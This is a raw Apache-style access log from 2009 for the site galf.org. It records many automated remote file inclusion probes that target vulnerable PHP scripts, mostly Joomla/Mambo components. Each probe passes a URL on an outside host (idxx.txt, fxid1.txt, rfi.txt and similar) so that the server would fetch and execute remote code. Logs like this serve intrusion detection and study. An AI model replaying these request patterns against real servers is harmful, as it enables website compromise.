129.215.82.1 - - [27/Sep/2009:22:47:22 -0700] "GET /logs/access.log%20%20//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:22:47:22 -0700] "GET /index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:22:47:22 -0700] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.175.211.6 - - [27/Sep/2009:22:47:36 -0700] "GET /?sourcedir=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
213.175.211.6 - - [27/Sep/2009:22:47:36 -0700] "GET /logs/?sourcedir=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
213.175.211.6 - - [27/Sep/2009:22:47:38 -0700] "GET /logs/access_090518.log/?sourcedir=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.175.211.6 - - [27/Sep/2009:22:47:56 -0700] "GET /logs/access_090406.log//?sourcedir=http://we.sg/bash/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:22:48:45 -0700] "GET /logs/access.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
70.38.112.174 - - [27/Sep/2009:22:49:37 -0700] "GET /logs/access.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://shephoe.fileave.com/fxid1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.175.211.6 - - [27/Sep/2009:22:50:03 -0700] "GET /logs/access_090518.log%20%20/?sourcedir=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
70.38.112.174 - - [27/Sep/2009:22:50:27 -0700] "GET /logs/access.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://shephoe.fileave.com/fxid1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [27/Sep/2009:22:53:01 -0700] "GET /logs/access_090824.log//viewbody.html?code=http://www.birdmobile.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [27/Sep/2009:22:53:01 -0700] "GET /logs//viewbody.html?code=http://www.birdmobile.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [27/Sep/2009:22:53:01 -0700] "GET /viewbody.html?code=http://www.birdmobile.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [27/Sep/2009:22:53:05 -0700] "GET /logs/access_090914.log//viewbody.html?code=http://www.birdmobile.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.184.252.3 - - [27/Sep/2009:22:53:16 -0700] "GET /common/db.php?commonpath=http://www.meililai.co.kr/bbs//zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.184.252.3 - - [27/Sep/2009:22:53:16 -0700] "GET /logs//common/db.php?commonpath=http://www.meililai.co.kr/bbs//zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.184.252.3 - - [27/Sep/2009:22:53:19 -0700] "GET /logs/access_090608.log%20%20//common/db.php?commonpath=http://www.meililai.co.kr/bbs//zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.175.211.6 - - [27/Sep/2009:22:54:06 -0700] "GET /logs/access_090406.log%20%20/?sourcedir=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.12.226 - - [27/Sep/2009:22:54:34 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.12.226 - - [27/Sep/2009:22:54:34 -0700] "GET /modules/vwar/admin/admin.php?vwar_root=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.12.226 - - [27/Sep/2009:22:54:34 -0700] "GET /logs/access_090810.log//modules/vwar/admin/admin.php?vwar_root=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.184.252.3 - - [27/Sep/2009:22:54:35 -0700] "GET /logs/access_090615.log%20%20//common/db.php?commonpath=http://www.meililai.co.kr/bbs//zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.12.226 - - [27/Sep/2009:22:56:43 -0700] "GET /logs/access.log//modules/vwar/admin/admin.php?vwar_root=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
89.188.106.38 - - [27/Sep/2009:22:59:02 -0700] "GET /logs/access_090420.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
89.188.106.38 - - [27/Sep/2009:22:59:02 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
89.188.106.38 - - [27/Sep/2009:22:59:02 -0700] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
210.115.58.73 - - [27/Sep/2009:23:00:32 -0700] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://www.shinchang.es.kr/board///su/rfi.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
210.115.58.73 - - [27/Sep/2009:23:00:32 -0700] "GET /lostpasswd.php?env[include_prefix]=http://www.shinchang.es.kr/board///su/rfi.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
210.115.58.73 - - [27/Sep/2009:23:00:32 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.shinchang.es.kr/board///su/rfi.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
89.188.106.38 - - [27/Sep/2009:23:00:37 -0700] "GET /logs/access_090420.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
89.188.106.38 - - [27/Sep/2009:23:00:37 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
89.188.106.38 - - [27/Sep/2009:23:00:37 -0700] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [27/Sep/2009:23:00:42 -0700] "GET /logs/access_090824.log%20%20//viewbody.html?code=http://www.birdmobile.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [27/Sep/2009:23:00:42 -0700] "GET /logs/access_090914.log%20%20//viewbody.html?code=http://www.birdmobile.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.4.8.14 - - [27/Sep/2009:23:02:09 -0700] "GET /logs/access_090706.log%20%20//errors.php?error=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.4.8.14 - - [27/Sep/2009:23:02:09 -0700] "GET /errors.php?error=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.4.8.14 - - [27/Sep/2009:23:02:09 -0700] "GET /logs//errors.php?error=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
77.37.18.233 - - [27/Sep/2009:23:02:33 -0700] "GET /logs/access_090622.log%20%20///?path[docroot]=http://www.karuturi.com/baner.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
77.37.18.233 - - [27/Sep/2009:23:02:48 -0700] "GET /logs/access_090706.log%20%20///?path[docroot]=http://www.karuturi.com/baner.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.4.8.14 - - [27/Sep/2009:23:03:47 -0700] "GET /logs/access_090706.log//errors.php?error=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [27/Sep/2009:23:04:12 -0700] "GET /logs/access_090824.log%20%20//viewbody.html?code=http://www.birdmobile.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [27/Sep/2009:23:04:13 -0700] "GET /logs/access_090914.log%20%20//viewbody.html?code=http://www.birdmobile.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.4.8.14 - - [27/Sep/2009:23:04:37 -0700] "GET /logs/access_090831.log//errors.php?error=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:23:04:47 -0700] "GET /logs/access.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://unixstats.org/tools/idxx.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:23:04:47 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:23:04:47 -0700] "GET /index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
203.234.62.129 - - [27/Sep/2009:23:04:48 -0700] "GET /index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
203.234.62.129 - - [27/Sep/2009:23:04:48 -0700] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
203.234.62.129 - - [27/Sep/2009:23:04:48 -0700] "GET /logs/access_090330.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
203.234.62.129 - - [27/Sep/2009:23:04:58 -0700] "GET /logs/access_090518.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.184.252.3 - - [27/Sep/2009:23:05:40 -0700] "GET /admin/business_inc/saveserver.php?thisdir=http://sports.wisegiga.net/bbs/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.184.252.3 - - [27/Sep/2009:23:05:40 -0700] "GET /logs/access_090824.log%20%20//admin/business_inc/saveserver.php?thisdir=http://sports.wisegiga.net/bbs/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.184.252.3 - - [27/Sep/2009:23:05:46 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://sports.wisegiga.net/bbs/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.12.226 - - [27/Sep/2009:23:05:52 -0700] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
69.175.12.226 - - [27/Sep/2009:23:05:52 -0700] "GET /logs/access.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
69.175.12.226 - - [27/Sep/2009:23:05:52 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
129.215.82.1 - - [27/Sep/2009:23:06:06 -0700] "GET /logs/access.log%20%20//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.184.252.3 - - [27/Sep/2009:23:06:52 -0700] "GET /logs/access_090907.log%20%20//admin/business_inc/saveserver.php?thisdir=http://sports.wisegiga.net/bbs/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.12.226 - - [27/Sep/2009:23:07:13 -0700] "GET /logs/access.log%20%20/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
72.11.145.8 - - [27/Sep/2009:23:08:12 -0700] "GET /logs//viewbody.html?code=http://www.birdmobile.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [27/Sep/2009:23:08:12 -0700] "GET /logs/access_090824.log%20%20//viewbody.html?code=http://www.birdmobile.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [27/Sep/2009:23:08:13 -0700] "GET /viewbody.html?code=http://www.birdmobile.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [27/Sep/2009:23:08:24 -0700] "GET /logs/access_090914.log%20%20//viewbody.html?code=http://www.birdmobile.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
82.193.15.3 - - [27/Sep/2009:23:10:49 -0700] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_180836f9b956ab9d91a50f9add968699?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
82.193.15.3 - - [27/Sep/2009:23:10:49 -0700] "GET /logs/access.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_180836f9b956ab9d91a50f9add968699?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
82.193.15.3 - - [27/Sep/2009:23:10:49 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_180836f9b956ab9d91a50f9add968699?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
72.11.145.8 - - [27/Sep/2009:23:10:51 -0700] "GET /logs/access_090706.log///appserv/main2.php?appserv_root=http://ulsanmis.pe.kr/bbs/admin/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [27/Sep/2009:23:11:37 -0700] "GET /logs//viewbody.html?code=http://www.birdmobile.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [27/Sep/2009:23:11:37 -0700] "GET /viewbody.html?code=http://www.birdmobile.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [27/Sep/2009:23:11:37 -0700] "GET /logs/access_090824.log//viewbody.html?code=http://www.birdmobile.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [27/Sep/2009:23:11:41 -0700] "GET /logs/access_090914.log//viewbody.html?code=http://www.birdmobile.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
64.6.107.34 - - [27/Sep/2009:23:11:45 -0700] "GET /logs/access_090720.log//?path%5Bdocroot%5D=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_180836f9b956ab9d91a50f9add968699?? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
64.6.107.34 - - [27/Sep/2009:23:11:45 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_180836f9b956ab9d91a50f9add968699?? HTTP/1.1" 200 4947 "-" "libwww-perl/5.831" "www.galf.org"
64.6.107.34 - - [27/Sep/2009:23:11:45 -0700] "GET /?path%5Bdocroot%5D=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_180836f9b956ab9d91a50f9add968699?? HTTP/1.1" 200 1048 "-" "libwww-perl/5.831" "www.galf.org"
78.110.50.120 - - [27/Sep/2009:23:11:57 -0700] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_180836f9b956ab9d91a50f9add968699?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
78.110.50.120 - - [27/Sep/2009:23:11:57 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_180836f9b956ab9d91a50f9add968699?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
78.110.50.120 - - [27/Sep/2009:23:11:58 -0700] "GET /logs/access.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_180836f9b956ab9d91a50f9add968699?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
72.11.145.8 - - [27/Sep/2009:23:11:59 -0700] "GET /logs/access_090824.log//viewbody.html?code=http://www.birdmobile.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
64.6.107.34 - - [27/Sep/2009:23:12:01 -0700] "GET /logs/access_090525.log//?path%5Bdocroot%5D=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_180836f9b956ab9d91a50f9add968699?? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
213.175.211.6 - - [27/Sep/2009:23:12:20 -0700] "GET /logs/access_090406.log/?sourcedir=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
64.6.107.34 - - [27/Sep/2009:23:13:05 -0700] "GET /logs/access.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_180836f9b956ab9d91a50f9add968699?? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "galf.org"
64.6.107.34 - - [27/Sep/2009:23:13:05 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_180836f9b956ab9d91a50f9add968699?? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "galf.org"
64.6.107.34 - - [27/Sep/2009:23:13:05 -0700] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_180836f9b956ab9d91a50f9add968699?? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "galf.org"
78.110.50.120 - - [27/Sep/2009:23:13:14 -0700] "GET /logs/access_090720.log//?path%5Bdocroot%5D=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_180836f9b956ab9d91a50f9add968699?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
78.110.50.120 - - [27/Sep/2009:23:13:14 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_180836f9b956ab9d91a50f9add968699?? HTTP/1.1" 200 4947 "-" "libwww-perl/5.805" "www.galf.org"
78.110.50.120 - - [27/Sep/2009:23:13:14 -0700] "GET /?path%5Bdocroot%5D=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_180836f9b956ab9d91a50f9add968699?? HTTP/1.1" 200 1048 "-" "libwww-perl/5.805" "www.galf.org"
78.110.50.120 - - [27/Sep/2009:23:13:51 -0700] "GET /logs/access_090525.log//?path%5Bdocroot%5D=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_180836f9b956ab9d91a50f9add968699?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.11.145.8 - - [27/Sep/2009:23:13:59 -0700] "GET /logs/access_090914.log//viewbody.html?code=http://www.birdmobile.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
77.93.207.161 - - [27/Sep/2009:23:20:53 -0700] "GET /faqsupport/samplefaqsupport.php?path[docroot]=http://ulsanmis.pe.kr/bbs/admin/fx29id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
77.93.207.161 - - [27/Sep/2009:23:20:53 -0700] "GET /logs/access_090420.log//faqsupport/samplefaqsupport.php?path[docroot]=http://ulsanmis.pe.kr/bbs/admin/fx29id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
77.93.207.161 - - [27/Sep/2009:23:20:53 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://ulsanmis.pe.kr/bbs/admin/fx29id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
203.234.62.129 - - [27/Sep/2009:23:22:40 -0700] "GET /logs/access.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
83.133.121.221 - - [27/Sep/2009:23:23:01 -0700] "GET /logs/access.log/setup.php?dir=http://pengecutes.fileave.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "galf.org"
83.133.121.221 - - [27/Sep/2009:23:23:01 -0700] "GET /logs/setup.php?dir=http://pengecutes.fileave.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "galf.org"
83.133.121.221 - - [27/Sep/2009:23:23:01 -0700] "GET /setup.php?dir=http://pengecutes.fileave.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "galf.org"
72.11.145.8 - - [27/Sep/2009:23:24:42 -0700] "GET /logs/access_090824.log%20%20//viewbody.html?code=http://www.birdmobile.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [27/Sep/2009:23:24:44 -0700] "GET /logs/access_090914.log%20%20//viewbody.html?code=http://www.birdmobile.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
94.23.2.21 - - [27/Sep/2009:23:26:26 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://nashi-deti.org.ua/plugins/editors/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "galf.org"
94.23.2.21 - - [27/Sep/2009:23:26:26 -0700] "GET /logs/access.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://nashi-deti.org.ua/plugins/editors/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "galf.org"
94.23.2.21 - - [27/Sep/2009:23:26:26 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://nashi-deti.org.ua/plugins/editors/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "galf.org"
94.23.2.21 - - [27/Sep/2009:23:26:32 -0700] "GET /logs/access.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://nashi-deti.org.ua/plugins/editors/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "galf.org"
94.23.2.21 - - [27/Sep/2009:23:26:32 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://nashi-deti.org.ua/plugins/editors/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "galf.org"
94.23.2.21 - - [27/Sep/2009:23:26:32 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://nashi-deti.org.ua/plugins/editors/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "galf.org"
69.175.12.226 - - [27/Sep/2009:23:29:09 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
69.175.12.226 - - [27/Sep/2009:23:29:09 -0700] "GET /logs/access.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
69.175.12.226 - - [27/Sep/2009:23:29:09 -0700] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
69.175.12.226 - - [27/Sep/2009:23:29:18 -0700] "GET /logs/access_090914.log/index.php?body=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.12.226 - - [27/Sep/2009:23:29:19 -0700] "GET /logs/index.php?body=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.12.226 - - [27/Sep/2009:23:29:19 -0700] "GET /index.php?body=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.12.226 - - [27/Sep/2009:23:29:33 -0700] "GET /logs/access_090413.log/index.php?body=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.12.226 - - [27/Sep/2009:23:30:03 -0700] "GET /logs/access_090914.log%20%20/index.php?body=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.12.226 - - [27/Sep/2009:23:30:04 -0700] "GET /logs/access_090413.log%20%20/index.php?body=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [27/Sep/2009:23:31:36 -0700] "GET /logs/access_090601.log%20%20///appserv/main2.php?appserv_root=http://ulsanmis.pe.kr/bbs/admin/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [27/Sep/2009:23:31:39 -0700] "GET /logs/access_090706.log%20%20///appserv/main2.php?appserv_root=http://ulsanmis.pe.kr/bbs/admin/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
87.106.95.46 - - [27/Sep/2009:23:32:28 -0700] "GET /logs/include%20addons%20import_export%20pages%20index.inc.phphttp://www.framoss.ru/joomla/mambots/res.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.106.95.46 - - [27/Sep/2009:23:32:28 -0700] "GET /include%20addons%20import_export%20pages%20index.inc.phphttp://www.framoss.ru/joomla/mambots/res.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
